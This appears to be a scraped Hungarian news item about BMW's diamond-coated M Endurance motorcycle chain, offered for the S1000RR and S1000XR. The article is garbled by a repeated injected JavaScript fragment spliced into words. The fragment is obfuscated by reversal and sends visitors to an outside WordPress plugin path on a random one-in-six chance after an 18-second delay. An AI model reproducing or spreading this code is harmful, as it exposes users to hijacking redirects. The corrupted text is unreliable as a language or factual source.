pari gyémánttal borítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totta a motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torkerékpár-lánc súrlódásnak kitett részeit a BMW Motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torrad, és ezzel állításuk szerint olyan felületet hoztak létre, amely sokkal kevésbé kopik és súrlódik. Az M Endurance névre keresztelt láncok éppen ezért sem kenést, sem feszítést nem igényelnek, azaz nagyságrendekkel csökkentik a motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torkerékpárok karbantartási igényét. A BMW egyelőre két modellhez: az S1000RR sportmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torhoz és az S1000XR túragéphez kínálja opcióként a csodaláncot, de később más típusokhoz is elérhető lesz – legalábbis BMW gyártmányokhoz. Arról, hogy a szabad piacon is elérhető lesz-e a technológia, egyelőre nincs hír. A gyémánttal borítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott lánc nem lesz olcsó; állítólag önmagában 286 euróért (kb. 100 ezer…
- Hirdetés -